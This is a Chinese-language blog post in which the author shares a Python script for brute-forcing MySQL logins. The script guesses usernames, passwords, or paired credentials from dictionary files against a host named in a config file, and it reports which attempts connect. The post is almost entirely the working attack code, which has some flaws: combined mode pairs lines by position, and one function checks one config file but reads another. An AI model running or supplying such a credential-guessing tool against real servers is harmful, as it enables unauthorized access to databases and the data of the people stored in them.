haq5201314

python 构造mysql爆破器

前言:

今天已经期末考完,睡了个觉起床写了个

mysql爆破器.

思路:

1.爆破用户->用户存在的话不会报错反之报错

2.爆破密码->密码正确不会报错反之报错

3.用户名和密码一起爆破->用户名和密码正确不会报错反之报错

用到的模块:

optparser

pymysql

configparser

os

代码:

 

import pymysql
import optparse
import os
import configparser

def main():
    parser=optparse.OptionParser()
    parser.add_option('-u',dest='username',help='MySQL username of blasting')
    parser.add_option('-p',dest='password',help='MySQL password of blasting')
    parser.add_option('-a',action='store_true',dest='all',help='MySQL all of blasting')
    parser.add_option('-U',dest='zhidinusername',help='Configuration parameters for all: specify user dictionary')
    parser.add_option('-P',dest='zhidinpassword',help='Configuration parameters for all: specify password dictionary')
    (options,args)=parser.parse_args()
    if options.username:
        file=options.username
        usernamepo(file)
    elif options.password:
        file2=options.password
        passwordpo(file2)
    elif options.all and options.zhidinusername and options.zhidinpassword:
        un=options.zhidinusername
        pd=options.zhidinpassword
        allpo(un,pd)
    else:
        parser.print_help()
        exit()

def usernamepo(file):
    cx=open('{}'.format(file),'r')
    if os.path.exists('config.ini'):
        print('[+]Config.ini ok')
    else:
        print('[-]Config.ini Not Found')
        exit()

    print('[*]Read the configuration file information')
    cf=configparser.ConfigParser()
    cf.read('config.ini')
    host=cf.get('config','host')
    port=cf.get('config','port')
    password=cf.get('config','password')
    print('[/]-------Config.ini-------')
    print('[+]Host:{}'.format(host))
    print('[+]Port:{}'.format(port))
    print('[+]password{}'.format(password))

    print('[/]------User.txt----------')
    if os.path.exists(file):
        print('[+]User.txt ok')
    else:
        print('[-]User.txt Not Found')

    print('[/]------Mysql blasting------')
    for k in cx.readlines():
        try:
            db=pymysql.connect(host,k.strip(),password)
            print('[+]Mysql Username in {}'.format(k.strip()))
        except Exception as g:
            print('[-]Not Username:{},and Error{}'.format(k.strip(),g))


def passwordpo(file2):
    cx = open('{}'.format(file2), 'r')
    if os.path.exists('config.ini'):
        print('[+]Config.ini ok')
    else:
        print('[-]Config.ini Not Found')
        exit()

    print('[*]Read the configuration file information')
    cf = configparser.ConfigParser()
    cf.read('config2.ini')
    host = cf.get('config', 'host')
    port = cf.get('config', 'port')
    username = cf.get('config', 'username')
    print('[/]-------Config.ini-------')
    print('[+]Host:{}'.format(host))
    print('[+]Port:{}'.format(port))
    print('[+]username{}'.format(username))

    print('[/]------passwd.txt----------')
    if os.path.exists(file2):
        print('[+]Passwd.txt ok')
    else:
        print('[-]Passwd.txt Not Found')

    print('[/]------Mysql blasting------')
    for k in cx.readlines():
        try:
            db = pymysql.connect(host, username, k.strip())
            print('[+]Mysql Password in {}'.format(k.strip()))
        except Exception as g:
            print('[-]Not Password:{},and Error{}'.format(k.strip(), g))


def  allpo(un,pd):
    user=open('{}'.format(un),'r')
    passs=open('{}'.format(pd),'r')
    usern=[]
    passn=[]
    if os.path.exists(un):
        print('[+]Username.txt is ok')
    else:
        print('[-]Not Found username.txt')

    if os.path.exists(pd):
        print('[+]Password.txt is ok')
    else:
        print('[-]Not Found password.txt')

    if os.path.exists('config3.ini'):
        print('[+]Config3.ini ok')
    else:
        print('[-]Config3.ini Not Found')
        exit()

    cf=configparser.ConfigParser()
    print('[/---------cofnig3.ini-------]')
    cf.read('config3.ini')
    host=cf.get('config','host')
    print('[+]host:{}'.format(host))

    print('[/]------Mysql blasting------')
    for u in user.readlines():
        usern.append(u.strip())
    for y in passs.readlines():
        passn.append(y.strip())
    for g in range(0,len(usern)):
        try:
            dk=pymysql.connect(host,usern[g],passn[g])
            print('[+]Username:{} and password:{}'.format(usern[g],passn[g]))
        except Exception as p:
            print('[-]Not username:{} and password:{} and Error:{}'.format(usern[g],passn[g],p))


if __name__ == '__main__':
    main()

 

-u测试:

-p测试:

 

 -a测试:

实际连接:

 

posted on 2018-07-06 16:16 东京$ 阅读(...) 评论(...) 编辑 收藏

分类:

技术点:

相关文章: